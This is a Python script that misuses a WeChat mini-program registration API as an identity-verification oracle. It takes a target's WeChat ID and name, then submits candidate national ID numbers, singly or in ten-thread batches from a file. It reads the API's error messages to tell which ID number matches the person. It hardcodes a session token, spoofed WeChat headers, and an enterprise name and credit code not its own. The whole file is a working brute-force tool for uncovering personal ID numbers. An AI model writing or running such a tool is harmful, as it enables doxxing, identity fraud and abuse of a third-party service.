import requests
import json
import threading
from queue import Queue
import logging
import time

url = "https://kj.kuaiquyun.cn/xcxgl/api/RegisterMini/registerMiniAppTo"

payload = {
    "authorizer_appid": "wx934d17a8e2c55d3d",
    "enterprise_name": "新华社",
    "code": "91441624MA575CEP6E",
    "code_type": "1"
}

headers = {
    'User-Agent': "Mozilla/5.0 (Linux; Android 15; 2211133C Build/AQ3A.240912.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/130.0.6723.103 Mobile Safari/537.36 XWEB/1300473 MMWEBSDK/20241202 MMWEBID/8144 MicroMessenger/8.0.56.2800(0x2800385E) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64 MiniProgramEnv/android",
    'Content-Type': "application/json",
    'token': "dd53d797412a2f49e871eae7ee572809",
    'charset': "utf-8",
    'Referer': 'https://servicewechat.com/wx39d1c62a52c73e97/4/page-frame.html'
}

# 全局变量
lock = threading.Lock()
stop_flag = False
total_tested = 0
start_time = time.time()
successful_results = []  # 存储验证成功的结果

def worker():
    global stop_flag, total_tested, wechat_id, person_name
    while True:
        idcard = q.get()
        if idcard is None:
            break
        payload["legal_persona_wechat"] = wechat_id
        payload["legal_persona_name"] = person_name
        payload["legal_persona_idcard"] = idcard

        try:
            response = requests.post(url, data=json.dumps(payload), headers=headers)
            if response.status_code == 200:
                result = response.json()
                with lock:
                    total_tested += 1
                    elapsed = time.time() - start_time
                    tested_per_sec = total_tested / elapsed if elapsed > 0 else 0

                    if result.get('code') == 0 and ("invalid admin" in result.get('msg', '') or "身份证号不正确" in result.get('msg', '')):
                        status = "验证失败🔴"
                        print(f"{wechat_id}-{person_name}-{idcard}-{status}")
                    elif result.get('code') == 1 and result.get('msg') == "操作成功":
                        status = "一致✅"
                        print(f"{wechat_id}-{person_name}-{idcard}-{status}")
                    elif result.get('code') == 1 and result.get('msg') == "该appid已有转正任务执行中,距上次任务24h后再试":
                        status = "该appid已有转正任务执行中,距上次任务24h后再试✅"
                        print(f"{wechat_id}-{person_name}-{idcard}-{status}")
                    else:
                        status = "验证成功✅"
                        successful_results.append(f"{wechat_id}-{person_name}-{idcard}")  # 新增成功记录
                        print(f"{wechat_id}-{person_name}-{idcard}-{status}")
            else:
                with lock:
                    logging.error(f"请求失败,状态码: {response.status_code}")
        except Exception as e:
            with lock:
                logging.error(f"请求过程中出现异常: {e}")
        q.task_done()

# 选择验证模式
print("请选择验证模式:")
print("1 单次验证")
print("2 批量验证")
mode = input()
if mode not in ["1", "2"]:
    print("输入的模式选择无效,请输入1或2。")
    exit(1)

wechat_id = input("请输入微信号: ")
person_name = input("请输入名字: ")

if mode == "1":
    idcard = input("请输入身份证号: ")
    payload["legal_persona_wechat"] = wechat_id
    payload["legal_persona_name"] = person_name
    payload["legal_persona_idcard"] = idcard

    try:
        response = requests.post(url, data=json.dumps(payload), headers=headers)
        if response.status_code == 200:
            result = response.json()
            with lock:
                if result.get('code') == 0 and ("invalid admin" in result.get('msg', '') or "身份证号不正确" in result.get('msg', '')):
                    status = "核验失败🔴"
                    print(f"{wechat_id}-{person_name}-{idcard}-{status}")
                elif result.get('code') == 1 and result.get('msg') == "操作成功":
                    status = "一致✅"
                    print(f"{wechat_id}-{person_name}-{idcard}-{status}")
                elif result.get('code') == 1 and result.get('msg') == "该appid已有转正任务执行中,距上次任务24h后再试":
                    status = "该appid已有转正任务执行中,距上次任务24h后再试✅"
                    print(f"{wechat_id}-{person_name}-{idcard}-{status}")
                else:
                    status = "验证成功✅"
                    successful_results.append(f"{wechat_id}-{person_name}-{idcard}")  # 新增成功记录
                    print(f"{wechat_id}-{person_name}-{idcard}-{status}")
            
            # 显示最终结果
            print("\n最终核验一致的结果:")
            for result in successful_results:
                print(f"{result}-验证成功✅")
        else:
            logging.error(f"请求失败,状态码: {response.status_code}")
    except Exception as e:
        logging.error(f"单次验证过程中出现异常: {e}")

elif mode == "2":
    try:
        with open('鼠鼠.txt', 'r') as file:
            idcards = file.read().splitlines()
    except FileNotFoundError:
        print("找不到名为鼠鼠.txt的文件")
        exit(1)

    q = Queue()
    for idcard in idcards:
        q.put(idcard)

    threads = []
    for _ in range(10):
        t = threading.Thread(target=worker)
        t.start()
        threads.append(t)

    q.join()

    for _ in range(10):
        q.put(None)
    for t in threads:
        t.join()

    # 显示最终结果
    print("\n最终核验一致的结果:")
    for result in successful_results:
        print(f"{result}-验证成功✅")
